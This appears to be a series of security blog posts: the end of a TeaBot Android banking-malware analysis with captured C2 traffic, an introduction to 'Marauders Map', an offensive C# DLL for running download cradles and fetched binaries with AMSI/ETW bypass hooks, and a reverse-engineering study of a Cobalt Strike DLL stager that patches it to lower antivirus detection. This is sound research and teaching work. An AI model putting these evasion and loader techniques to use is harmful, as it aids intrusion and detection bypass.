Finally, another interesting permission for malware is the RECEIVE_SMS permission, which allows an application to read received SMS messages. While this can definitely be used to invade the user’s privacy, the main reason for malware to acquire this permission is to intercept 2FA tokens which are unfortunately often still sent through SMS. Next to SIM-swapping attacks and attacks against the SS7 infrastructure, this is another way in which those tokens can be stolen.

This permission is pretty self-explanatory and a typical user will probably not grant the permission to a game that they just installed. However, by using phishing, overlays or accessibility attacks, malware can make sure the user accepts the permission.

Does this mean your device is fully compromised? Yes, and no.

Given the very intrusive nature of the attacks described above, it’s not a stretch to say that your device is fully compromised. If malware can access what you see, monitor what you do and perform actions on your behalf, they’re basically using your device just like you would. However, the malware is still (ab)using legitimate functionality provided by the OS, and that does come with restrictions.

For example, even applications with full accessibility permissions aren’t able to access data that is stored inside the application container of another app. This means that private information stored within an app is safe, unless you of course access the data through the app and the accessibility service actively collects everything on the screen.

By combining accessibility and overlay windows, it is actually much easier to social engineer the victim and get their credentials or card information. And this is exactly what Banking Trojans often do. Instead of attacking an application and trying to steal their authentication tokens or modify their behavior, they simply ask the user for all the information that’s required to either authenticate to a financial website or enroll a new device with the user’s credentials.

How to protect your app

Protecting against overlays

Protecting your application against a full overlay is, well, impossible. Some research has already been performed on this and one of the suggestions is to add a visual indicator on the device itself that can inform the user about an overlay attack tacking place. Another study took a look at detecting suspicious patterns during app-review to identify overlay malware. While the research is definitely interesting, it doesn’t really help you when developing an application.

And even if you could detect an overlay on top of your application. What could your application do? There are a few options, but none of them really work:

  • Close the application > Doesn’t matter, the attack just continues, since there’s a full overlay
  • Show something to the user to warn them > Difficult, since you’re not the top-level view
  • Inform the backend and block the account > Possible, though many false negatives. Imagine customer accounts being blocked because they have Facebook messenger installed…

What remains is trying to detect an attack and informing your backend. Instead of directly blocking an account, the information could be taken into account when performing risk analysis on a new sign-up or transaction. There are a few ways to collect this information, but all of them can have many false positives:

  • You can detect if a screen has been obfuscated by listening for onFilterTouchEventForSecurity events. There are however various edge cases where it doesn’t work as expected and will lead to many false negatives and false positives.
  • You can scan for installed applications and check if a suspicious application is installed. This would require you to actively track mobile malware campaigns and update your blacklist accordingly. Given the fact that malware samples often have random package names, this will be very difficult. Additionally, starting with Android 11 (Q), it actually becomes impossible to scan for applications which you don’t define in your Android Manifest.
  • You can use accessibility services yourself to monitor which views are created by the Android OS and trigger an error if specific scenarios occur. While this could technically work, it would give people the idea that financial applications do actually require accessibility services, which would play into the hands of malware developers.

The only real feasible implementation is detection through the onFilterTouchEventForSecurity handler, and, given the many false positives, it can only be used in conjunction with other information during a risk assessment.

Protecting against accessibility attacks

Unfortunately it’s not much better than the section. There are many different settings you can set on views, components and text fields, but all of them are designed to help you improve the accessibility of your application. Removing all accessibility data from your application could help a bit, but this will of course also stop legitimate accessibility software from analyzing your application.

But let’s for a moment assume that we don’t care about legitimate accessibility. How can we make the app as secure as possible to prevent malware from logging our activities? Let’s see…

  • We could set the android:importantForAccessibility attribute of a view component to ‘no’ or ‘noHideDescendants’. This won’t work however, since the accessibility service can just ignore this property and still read everything inside the view component.
  • We could set all the android:contentDescription attributes to “@null”. This will effectively remove all the meta information from the application and will make it much more difficult to track a user. However, any text that’s on screen can still be captured, so the label of a button will still give information about its purpose, even if there is no content description. For input text, the content of the text field will still be available to the malware.
  • We could change every input text to a password field. Password fields are masked and their content isn’t accessible in clear-text format. Depending on the user’s settings, this won’t work either (see next section).
  • Enable FLAG_SECURE on the view. This will prevent screenshots of the view, but it doesn’t impact accessibility services.

About passwords

By default, Android shows the last entered character in a password field. This is useful for the user as they are able to see if they mistyped something. However, whenever this preview is shown, the value is also accessible to the accessibility services. As a result, we can still steal passwords, as shown in the second and third image below:

Left: A password being entered in ProxyDroid
Middle / Right: The entered password can be reconstructed based on the character previews

It is possible for users to disable this feature by going to Settings > Privacy > Show Passwords, but this setting cannot be manipulated from inside an application.

Detecting accessibility services

If we can’t protect our own application, can we maybe detect an attack? Here is where there’s finally some good news. It is possible to retrieve all the accessibility services running on the device, including their capabilities. This can be done through the AccessibilityManager.getEnabledAccessibilityServiceList.

This information could be used to identify suspicious services running on the device. This would require building an dataset of known-good services to compare against. Given that Google is really hammering down on applications requiring accessibility services in the Google Play store, this could be a valid approach.

The obvious downside is that there will still be false positives. Additionally, there may be some privacy related issues as well, since it might not be desirable to identify disabilities in users.

Can’t Google fix this?

For a large part, dealing with these overlay attacks is Google’s responsibility, and over the last few versions, they have made multiple changes to make it more difficult to use the SYSTEM_ALERT_WINDOW (SAW) overlay permission:

  • Android Q (Go Edition) doesn’t support the SAW.
  • Sideloaded apps on Android P loose the SAW permission upon reboot.
  • Android O has marked the SAW permission deprecated, though Android 11 has removed the deprecated status.
  • Play Store apps on Android Q loose the permission on reboot.
  • Android O shows a notification for apps that are performing overlays, but also allows you to disable the notifications through settings (and thus through accessibility as well).
  • Android Q introduced the Bubbles API, which deals with some of the use cases for SAW, but not all of them.

Almost all of these updates are mitigations and don’t fix the actual problem. Only the removal of SAW in Android Q (Go Edition) is a real way to stop overlay attacks, and it may hopefully one day make it into the standard Android version as well.

Android 12 Preview

The latest version of the Android 12 preview actually contains a new permission called ‘HIDE_OVERLAY_WINDOWS‘. After acquiring this permission, an app can call ‘setHideOverlayWindows()’ to disable overlays. This is another step in the right direction, but it’s still far from great. Instead of targeting the application when the user opens it, the malware could still create fake notifications that link directly to the overlay without the targeted application even being opened.

It’s clear that it’s not an easy problem to fix. Developers were given the option to use SAW since Android 1, and many apps rely on the permission to provide their core functionality. Removing it would affect many apps, and would thus get a lot of backlash. Finally, any new update that Google makes will take many years to reach a high percentage of Android users, due to Android’s slow update process and unwillingness for mobile device manufacturers to provide major OS updates to users.

Now that we understand the permissions involved, let’s go back to the TeaBot malware.

TeaBot – Attacking Belgian apps

What was surprising about Cleafy’s original report is the targeting of Belgian applications which so far had been spared of similar attacks. This is also a bit surprising since Belgian financial apps all make use of strong authentication (card readers, ItsMe, etc) and are thus pretty hard to successfully phish. Let’s take a look at how exactly the TeaBot family attacks these applications.

Once the TeaBot malware is installed, it shows a small animation to the user how to enable accessibility options. It doesn’t provide a specific explanation for the accessibility service, and it doesn’t pretend to be a Google or System service. However, if you wait too long to activate the accessibility service, the device will regularly start vibrating, which is extremely annoying and will surely convince many victims to enable the services.

  • Main view when opening the app
  • Automatically opens the Accessibility Settings
  • No description of the service
  • The service requests full control
  • If you wait too long, you get annoying popups and vibration
  • After enabling the service, the application quits and shows an error message

This specific sample pretends to be bpost, but TeaBot also pretends to be the VLC Media Player, the Spanish postal app Correos, a video streaming app called Mobdro, and UPS as well.

The malware sample has the following functionality related to attacking financial applications:

  • Take a screenshot;
  • Perform overlay attacks on specific apps;
  • Enable keyloggers for specific apps.

Just like the FluBot sample from our last blogpost, the application collects all of the installed applications and then sends them to the C2 which returns a list of the applications that should be attacked:

POST /api/getbotinjects HTTP/1.1
Accept-Charset: UTF-8
Content-Type: application/xml
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 776

{"installed_apps":[{"package":"org.proxydroid"},{"package":"com.android.documentsui"}, ...<snip>... ,{"package":"com.android.messaging"}]}
HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2
Date: Mon, 10 May 2021 19:20:51 GMT


In order to identify the applications that are attacked, we can supply a list of banking applications which will return more interesting data:

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 2031830
Date: Mon, 10 May 2021 18:28:01 GMT

		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>",
		"html":"<!DOCTYPE html><html lang=\"en\"><head> ...SNIP...</html>"

By brute-forcing against different C2 servers, overlays for the following apps were returned:


Only one Belgian financial application (be.belfius.directmobile.android) returned an overlay. The interesting part is that the overlay only phishes for credit card information and not for anything related to account onboarding:

The overlay requests the debit card number, but nothing else.

This overlay will be shown when TeaBot detects that the Belfius app has been opened. This way the user will expect a Belfius prompt to appear, which gives more credibility to the malicious view that was opened.

The original report by Cleafy specified at least 5 applications under attack, so we need to dig a bit deeper. Another endpoint called by the samples is /getkeyloggers. Fortunately, this one does simply return a list of targeted applications without us having to guess.

GET /api/getkeyloggers HTTP/1.1
Accept-Charset: UTF-8
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; Nexus 5 Build/QQ3A.200805.001)
Connection: close
Accept-Encoding: gzip, deflate

HTTP/1.1 200 OK
Connection: close
Content-Type: application/json
Server: Rocket
Content-Length: 1205
Date: Tue, 11 May 2021 12:45:30 GMT

[{"application":"com.ing.banking"},{"application":"com.binance.dev"},{"application":"com.bankinter.launcher"},{"application":"com.unicredit"},{"application":"com.lynxspa.bancopopolare"}, ... ]

Scattered over multiple C2 servers, we could identify the following targeted applications:


Based on this list, 14 Belgian applications are being attacked through the keylogger module. Since all these applications have a strong device onboarding and authentication flow, the impact of the collected information should be limited.

However, if the applications don’t detect the active keylogger, the malware could still collect any information entered by the user into the app. In this regard, the impact is the same as when someone installs a malicious keyboard that logs all the entered information.

Google Play Protect will protect you

The TeaBot sample is currently not known to spread in the Google Play store. That means victims will need to install it by downloading and installing the app manually. Most devices will have Google Play protect installed, which will automatically block the currently identified TeaBot samples.

Of course, this is a typical cat & mouse game between Google and malware developers, and who knows how many samples may go undetected …


It’s very interesting to see how TeaBot attacks the Belgian financial applications. While they don’t attempt to social engineer a user into a full device onboarding, the malware developers are finally identifying Belgium as an interesting target.

It will be very interesting to see how these attacks will evolve. Eventually all financial applications will have very strong authentication and then malware developers will either have to be satisfied with only stealing credit-card information, or they will have to invest into more advanced tactics with live challenge/responses and active social engineering.

From a development point of view, there’s not much we can do. The Android OS provides the functionality that is abused and it’s difficult to take that functionality away again. Collecting as much information about the device as possible can help in making correct assessments on the risk of certain transactions, but there’s no silver bullet.

Jeroen Beckers
Jeroen Beckers

Jeroen Beckers is a mobile security expert working in the NVISO Software and Security assessment team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff.

I Solemnly Swear I Am Up To No Good. Introducing the Marauders Map

27 April 2021 at 15:52

This blogpost will be a bit different, as it’s going to tell a bit of a story…

In this blogpost I want to achieve 2 objectives:

  • address a question I keep hearing and seeing pop up in my DM every now and then, “how do I become a red teamer/ how do I become a toolsmith / how do I learn more about internals”,…) and I will do so by telling about an experience that happened to me recently.
  • Introduce the Marauders Map, heavily inspired on the great work of MDSec’s SharpPack.

Without further ado, let’s get into it…

Why you should think before you run.

Quite recently one of our clients has asked us to do an assessment of their environment. We got initial foothold through an assumed breach scenario, giving us full access on a workstation as a normal user.
This organization is pretty well secured, and has been a client of us for a few years now. It’s always nice to see your clients mature as you advise them from a consultant point of view. That being said, we wanted to try something “different” than our other approaches.

Being a bit of a toolsmith myself, I was already working on 2 offensive tools, as it turns out both already existed in the open source world, as pointed out to me by @shitsecure (Fabian Mosch) and @domchell (Dominic Chell). Dominic from MDSec pointed me to a (fairly) old blogpost on their own blog, called SharpPack: The Insider Threat Toolkit and Fabian pointed me to a cool project from @Flangvik called NetLoader.

If you start releasing tools (or if you are a pentester/red teamer using OST (= Open Source Tooling)) you’ll see a few names pop up over and over again. In general, it’s a good idea from both red and blue to keep an eye on their work, as it is often of pretty high quality and nothing less than amazing.

Recently, I have come across some discussion in the infosec community about the OSCP and how a student (initially) failed their exam because they ran linPEAS. This brings me to the following point. If you want to become better at something, you should DO IT. A stupid but accurate example which will prove my point is the following: If you want to learn to drive a car, you will not learn it from watching other people drive a car. At one point, you’ll have to take place behind the wheel and drive for yourself, even if can be a bit scary.

Coding, pentesting and red teaming is no different. Let me ask you this, if you run tools you did not write yourself, and you never look at the source code of said tools, how can you understand what it does, and more importantly, how are you bringing value to your client? How can you give accurate and to the point recommendations, if you don’t even know how the exploit or tool works?

Unfortunately, I see a lot of pentesters and even red teamers make this mistake. And to be perfectly honest, I have made that mistake too. I just hope that this post might convince you to think twice before you “go loco” in your clients infrastructure next time

The Maraudersmap, a copy of Sharppack?

As I was already writing the tooling before I noticed sharppack was already a thing, I had three options:

  1. Trash my project
  2. Continue my project, taking sharppack into account
  3. Submit PR’s to sharppack

I was just on the verge of trashing my project, when my friend Fabian (@shitsecure) DM’d me noticing I had removed a tweet, and he stated something along the lines of, just continue the project and learn from it, and he was right. So two more options remained.

My code base was already out of sync with sharppack, as for example, I was leveraging IONIC.ZIP to execute binaries from encrypted zips, much like my other tool sharpziprunner does. Submitting PR’s would also mean I would have to take into account I should probably test the project extensively to see if my code would end up breaking things.

For that reason I decided to continue with the project as a separate project, and honestly, now that the project is release ready, I’m glad I did it like this, because I learned a thing or two along the way about reflection. Such as the Assembly.EntryPoint property. I have given a reflection brown bag a while ago, but as you can see, even an old dog can learn new tricks.

Introducing the Marauders Map

The Marauders map is quite similar to SharpPack, although there are some subtle differences, as already mentioned I’m using ionic’s zip nuget package for all my encrypted zip shenanigans, additionally I added functionality to bypass ETW and AMSI (although on the open source version of this project, you will have to bring your own) and I added functionality to retrieve binaries over the web.

I recommend reading the excellent work of MDSec in their blogpost, but to give you a quick rundown of what Marauders Map (and sharppack, by extent) do ….

MaraudersMap is a DLL written completely in C# using the DLLExport project which is pretty much magic in a box. This project makes it possible to decorate any static function with the [DllExport] tag, making it possible to serve as an entrypoint for unmanaged code.
Essentially this means you can now run C# using rundll32 for example.

A much more interesting functionality however can be seen below:

The primary use case of the marauder map is to be used for internal pentests, or for leg up scenarios where you get full GUI access to a workstation or citrix environment.

Marauders map can be leveraged by the office suite to do all the juicy stuff listed below:

  • Run powershell commands such as whoami, or even full-fleged downloadcradles a la IEX(New-Object … )
  • Run powershell scrips from within an encrypted zip, unpacking it completely in memory
  • Run C# binaries from within an encrypted zip, unpacking it completely in memory
  • Run C# binaries fetched from the internet

All these options can be extended with ETW and AMSI bypasses, which are not included in the project by default, attempting to run as-is will result in output stating “bring your own :)”.

Seems to work on both 32 bit and 64 bit office versions, you just have to compile to the correct architecture.

The GitHub project and its necessary documentation can be found here: https://github.com/NVISOsecurity/blogposts/tree/master/MaraudersMap


My initial thought was to get a PowerShell shell running in office, but for some reason the AllocConsole win32API call is not agreeing with office. If anyone knows how to fix this, submit a PR or shout me out on twitter. I had high hopes for this one. RIP PoshOffice (for now atleast)


Although open source tooling is great, you should not blindly run any tool you can find on GitHub without proper vetting of said tool first. It could lead to disasterous results such as leaving a permanent backdoor open at your clients environment. Additionally, leverage existing OST to hone your own coding skills further, when possible submit pull requests or create your own versions of existing OST. It will serve as a good learning school to learn more about coding but also about internal workings of specific processes.

Last but not least….

Jean-François Maes
Jean-François Maes

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course

Anatomy of Cobalt Strike’s DLL Stager

26 April 2021 at 16:51

NVISO recently monitored a targeted campaign against one of its customers in the financial sector. The attempt was spotted at its earliest stage following an employee’s report concerning a suspicious email. While no harm was done, we commonly identify any related indicators to ensure additional monitoring of the actor.

The reported email was an application for one of the company’s public job offers and attempted to deliver a malicious document. What caught our attention, besides leveraging an actual job offer, was the presence of execution-guardrails in the malicious document. Analysis of the document uncovered the intention to persist a Cobalt Strike stager through Component Object Model Hijacking.

During my free time I enjoy analyzing samples NVISO spots in-the-wild, and hence further dissected the Cobalt Strike DLL payload. This blog post will cover the payload’s anatomy, design choices and highlight ways to reduce both log footprint and time-to-shellcode.

Execution Flow Analysis

To understand how the malicious code works we have to analyze its behavior from start to end. In this section, we will cover the following flows:

  1. The initial execution through DllMain.
  2. The sending of encrypted shellcode into a named pipe by WriteBufferToPipe.
  3. The pipe reading, shellcode decryption and execution through PipeDecryptExec.

As previously mentioned, the malicious document’s DLL payload was intended to be used as a COM in-process server. With this knowledge, we can already expect some known entry points to be exposed by the DLL.

List of available entry points as displayed in IDA.

While technically the malicious execution can occur in any of the 8 functions, malicious code commonly resides in the DllMain function given, besides TLS callbacks, it is the function most likely to execute.

DllMain: An optional entry point into a dynamic-link library (DLL). When the system starts or terminates a process or thread, it calls the entry-point function for each loaded DLL using the first thread of the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded using the LoadLibrary and FreeLibrary functions.


Throughout the following analysis functions and variables have been renamed to reflect their usage and improve clarity.

The DllMain Entry Point

As can be seen in the following capture, the DllMain function simply executes another function by creating a new thread. This threaded function we named DllMainThread is executed without any additional arguments being provided to it.

Graphed disassembly of DllMain.

Analyzing the DllMainThread function uncovers it is an additional wrapper towards what we will discover is the malicious payload’s decryption and execution function (called DecryptBufferAndExec in the capture).

Disassembly of DllMainThread.

By going one level deeper, we can see the start of the malicious logic. Analysts experienced with Cobalt Strike will recognize the well-known MSSE-%d-server pattern.

Disassembly of DecryptBufferAndExec.

A couple of things occur in the above code:

  1. The sample starts by retrieving the tick count through GetTickCount and then divides it by 0x26AA. While obtaining a tick count is often a time measurement, the next operation solely uses the divided tick as a random number.
  2. The sample then proceeds to call a wrapper around an implementation of the sprintf function. Its role is to format a string into the PipeName buffer. As can be observed, the formatted string will be \\.\pipe\MSSE-%d-server where %d will be the result computed in the previous division (e.g.: \\.\pipe\MSSE-1234-server). This pipe’s format is a well-documented Cobalt Strike indicator of compromise.
  3. With the pipe’s name defined in a global variable, the malicious code creates a new thread to run WriteBufferToPipeThread. This function will be the next one we will analyze.
  4. Finally, while the new thread is running, the code jumps to the PipeDecryptExec routine.

So far, we had a linear execution from our DllMain entry point until the DecryptBufferAndExec function. We could graph the flow as follows:

Execution flow from DllMain until DecryptBufferAndExec.

As we can see, two threads are now going to run concurrently. Let’s focus ourselves on the one writing into the pipe (WriteBufferToPipeThread) followed by its reading counterpart (PipeDecryptExec) afterwards.

The WriteBufferToPipe Thread

The thread writing into the generated pipe is launched from DecryptBufferAndExec without any additional arguments. By entering into the WriteBufferToPipeThread function, we can observe it is a simple wrapper to WriteBufferToPipe except it furthermore passes the following arguments recovered from a global Payload variable (pointed to by the pPayload pointer):

  1. The size of the shellcode, stored at offset 0x4.
  2. A pointer to a buffer containing the encrypted shellcode, stored at offset 0x14.
Disassembly of WriteBufferToPipeThread.

Within the WriteBufferToPipe function we can notice the code starts by creating a new pipe. The pipe’s name is recovered from the PipeName global variable which, if you remember, was previously populated by the sprintf function. The code creates a single instance, outbound pipe (PIPE_ACCESS_OUTBOUND) by calling CreateNamedPipeA and then connects to it using the ConnectNamedPipe call.

Graphed disassembly of WriteBufferToPipe‘s named pipe creation.

If the connection was successful, the WriteBufferToPipe function proceeds to loop the WriteFile call as long as there are bytes of the shellcode to be written into the pipe.

Graphed disassembly of WriteBufferToPipe writing to the pipe.

One important detail worth noting is that once the shellcode is written into the pipe, the previously opened handle to the pipe is closed through CloseHandle. This indicates that the pipe’s sole purpose was to transfer the encrypted shellcode.

Once the WriteBufferToPipe function is completed, the thread terminates. Overall the execution flow was quite simple and can be graphed as follows:

Execution flow from WriteBufferToPipe.

The PipeDecryptExec Flow

As a quick refresher, the PipeDecryptExec flow was executed immediately after the creation of the WriteBufferToPipe thread. The first task performed by PipeDecryptExec is to allocate a memory region to receive shellcode to be transmitted through the named pipe. To do so, a call to malloc is performed with as argument the shellcode size stored at offset 0x4 of the global Payload variable.

Once the buffer allocation is completed, the code sleeps for 1024 milliseconds (0x400) and calls FillBufferFromPipe with both buffer location and buffer size as argument. Should the FillBufferFromPipe call fail by returning FALSE (0), the code loops again to the Sleep call and attempts the operation again until it succeeds. These Sleep calls and loops are required as the multi-threaded sample has to wait for the shellcode being written into the pipe.

Once the shellcode is written to the allocated buffer, PipeDecryptExec will finally launch the decryption and execution through XorDecodeAndCreateThread.

Graphed disassembly of PipeDecryptExec.

To transfer the encrypted shellcode from the pipe into the allocated buffer, FillBufferFromPipe opens the pipe in read-only mode (GENERIC_READ) using CreateFileA. As was done for the pipe’s creation, the name is retrieved from the global PipeName variable. If accessing the pipe fails, the function proceeds to return FALSE (0), resulting in the above described Sleep and retry loop.

Disassembly of FillBufferFromPipe‘s pipe access.

Once the pipe opened in read-only mode, the FillBufferFromPipe function proceeds to copy over the shellcode until the allocated buffer is filled using ReadFile. Once the buffer filled, the handle to the named pipe is closed through CloseHandle and FillBufferFromPipe returns TRUE (1).

Graphed disassembly of FillBufferFromPipe copying data.

Once FillBufferFromPipe has successfully completed, the named pipe has completed its task and the encrypted shellcode has been moved from one memory region to another.

Back in the caller PipeDecryptExec function, once the FillBufferFromPipe call returns TRUE the XorDecodeAndCreateThread function gets called with the following parameters:

  1. The buffer containing the copied shellcode.
  2. The length of the shellcode, stored at the global Payload variable’s offset 0x4.
  3. The symmetric XOR decryption key, stored at the global Payload variable’s offset 0x8.

Once invoked, the XorDecodeAndCreateThread function starts by allocating yet another memory region using VirtualAlloc. The allocated region has read/write permissions (PAGE_READWRITE) but is not executable. By not making a region writable and executable at the same time, the sample possibly attempts to evade security solutions which only look for PAGE_EXECUTE_READWRITE regions.

Once the region is allocated, the function loops over the shellcode buffer and decrypts each byte using a simple xor operation into the newly allocated region.

Graphed disassembly of XorDecodeAndCreateThread.

When the decryption is complete, the GetModuleHandleAndGetProcAddressToArg function is called. Its role is to place pointers to two valuable functions into memory: GetModuleHandleA and GetProcAddress. These functions should enable the shellcode to further resolve additional procedures without relying on them being imported. Before storing these pointers, the GetModuleHandleAndGetProcAddressToArg function first ensures a specific value is not FALSE (0). Surprisingly enough, this value stored in a global variable (here called zero) is always FALSE, resulting in the pointers never being stored.

Graphed disassembly of GetModuleHandleAndGetProcAddressToArg.

Back in the caller function, XorDecodeAndCreateThread changes the shellcode’s memory region to be executable (PAGE_EXECUTE_READ) using VirtualProtect and finally creates a new thread. This final thread starts at the JumpToParameter function which acts as a simple wrapper to the shellcode, provided as argument.

Disassembly of JumpToParameter.

From here, the previously encrypted Cobalt Strike shellcode stager executes to resolve WinINet procedures, download the final beacon and execute it. We will not cover the shellcode’s analysis in this post as it would deserve a post of its own.

While this last flow contained more branches and logic, the overall graph remains quite simple:

Execution flow from PipeDecryptExec until the shellcode.

Memory Flow Analysis

What was the most surprising throughout the above analysis was the presence of a well-known named pipe. Pipes can be used as a defense evasion mechanism by decrypting the shellcode at pipe exit or for inter-process communications; but in our case it merely acted as a memcpy to move encrypted shellcode from the DLL into another buffer.

Memory flow from encrypted shellcode until decryption.

So why would this overhead be implemented? As pointed out by another colleague, the answer lays in the Artifact Kit, a Cobalt Strike dependency:

Cobalt Strike uses the Artifact Kit to generate its executables and DLLs. The Artifact Kit is a source code framework to build executables and DLLs that evade some anti-virus products. […] One of the techniques [see: src-common/bypass-pipe.c in the Artifact Kit] generates executables and DLLs that serve shellcode to themselves over a named pipe. If an anti-virus sandbox does not emulate named pipes, it will not find the known bad shellcode.


As we can see in the above diagram, the staging of the encrypted shellcode in the malloc buffer generates a lot of overhead supposedly for evasion. These operations could be avoided should XorDecodeAndCreateThread instead directly read from the initial encrypted shellcode as outlined in the next diagram. Avoiding the usage of named pipes will furthermore remove the need for looped Sleep calls as the data would be readily available.

Improved memory flow from encrypted shellcode until decryption.

It seems we found a way to reduce the time-to-shellcode; but do popular anti-virus solutions actually get tricked by the named pipe?

Patching the Execution Flow

To test that theory, let’s improve the malicious execution flow. For starters we could skip the useless pipe-related calls and have the DllMainThread function call PipeDecryptExec directly, bypassing pipe creation and writing. How the assembly-level patching is performed is beyond this blog post’s scope as we are just interested in the flow’s abstraction.

Disassembly of the patched DllMainThread.

The PipeDecryptExec function will also require patching to skip malloc allocation, pipe reading and ensure it provides XorDecodeAndCreateThread with the DLL’s encrypted shellcode instead of the now-nonexistent duplicated region.

Disassembly of the patched PipeDecryptExec.

With our execution flow patched, we can furthermore zero-out any unused instructions should these be used by security solutions as a detection base.

When the patches are applied, we end up with a linear and shorter path until shellcode execution. The following graph focuses on this patched path and does not include the leaves beneath WriteBufferToPipeThread.

Outline of the patched (red) execution flow and functions.

As we also figured out how the shellcode is encrypted (we have the xor key), we modified both samples to redact the actual C2 as it can be used to identify our targeted customer.

To ensure the shellcode did not rely on any bypassed calls, we spun up a quick Python HTTPS server and made sure the redacted domain resolved to We then can invoke both the original and patched DLL through rundll32.exe and observe how the shellcode still attempts to retrieve the Cobalt Strike beacon, proving our patches did not affect the shellcode. The exported StartW function we invoke is a simple wrapper around the Sleep call.

Capture of both the original and patched DLL attempting to fetch the Cobalt Strike beacon.

Anti-Virus Review

So do named pipes actually work as a defense evasion mechanism? While there are efficient ways to measure our patches’ impact (e.g.: comparing across multiple sandbox solutions), VirusTotal does offer a quick primary assessment. As such, we submitted the following versions with redacted C2 to VirusTotal:

  • wpdshext.dll.custom.vir which is the redacted Cobalt Strike DLL.
  • wpdshext.dll.custom.patched.vir which is our patched and redacted Cobalt Strike DLL without named pipes.

As the original Cobalt Strike contains identifiable patterns (the named pipe), we would expect the patched version to have a lower detection ratio, although the Artifact Kit would disagree.

Capture of the original Cobalt Strike’s detection ratio on VirusTotal.
Capture of the patched Cobalt Strike’s detection ratio on VirusTotal.

As we expected, the named-pipe overhead leveraged by Cobalt Strike actually turned out to act as a detection base. As can be seen in the above captures, while the original version (left) obtained only 17 detections, the patched version (right) obtained one less for a total of 16 detections. Among the thrown-off solutions we noticed ESET and Sophos did not manage to detect the pipe-less version, whereas ZoneAlarm couldn’t identify the original version.

One notable observation is that an intermediary patch where the flow is adapted but unused code is not zeroed-out turned out to be the most detected version with a total of 20 hits. This higher detection rate occurs as this patch allows pipe-unaware anti-virus vendors to also locate the shellcode while pipe-related operation signatures are still applicable.

Capture of the intermediary patched Cobalt Strike’s detection ratio on VirusTotal.

While these tests focused on the default Cobalt Strike behavior against the absence of named pipes, one might argue that a customized named pipe pattern would have had the best results. Although we did not think of this variant during the initial tests, we submitted a version with altered pipe names (NVISO-RULES-%d instead of MSSE-%d-server) the day after and obtained 18 detections. As a comparison, our two other samples had their detection rate increase to 30+ over night. We however have to consider the possibility that these 18 detections are influenced by the initial shellcode being burned.


Reversing the malicious Cobalt Strike DLL turned out to be more interesting than expected. Overall, we noticed the presence of noisy operations whose usage weren’t a functional requirement and even turn out to act as a detection base. To confirm our hypothesis, we patched the execution flow and observed how our simplified version still reaches out to the C2 server with a lowered (almost unaltered) detection rate.

So why does it matter?

The Blue

First and foremost, this payload analysis highlights a common Cobalt Strike DLL pattern allowing us to further fine-tune detection rules. While this stager was the first DLL analyzed, we did take a look at other Cobalt Strike formats such as default beacons and those leveraging a malleable C2, both as Dynamic Link Libraries and Portable Executables. Surprisingly enough, all formats shared this commonly documented MSSE-%d-server pipe name and a quick search for open-source detection rules showed how little it is being hunted for.

The Red

Besides being helpful for NVISO’s defensive operations, this research further comforts our offensive team in their choice of leveraging custom-built delivery mechanisms; even more so following the design choices we documented. The usage of named pipes in operations targeting mature environments is more likely to raise red flags and so far does not seem to provide any evasive advantage without alteration in the generation pattern at least.

To the next actor targeting our customers: I am looking forward to modifying your samples and test the effectiveness of altered pipe names.

Maxime Thiebaut
Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified intrusion analyst in NVISO’s Managed Detection & Response team. He spends most of his time investigating incidents and improving detection capabilities. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.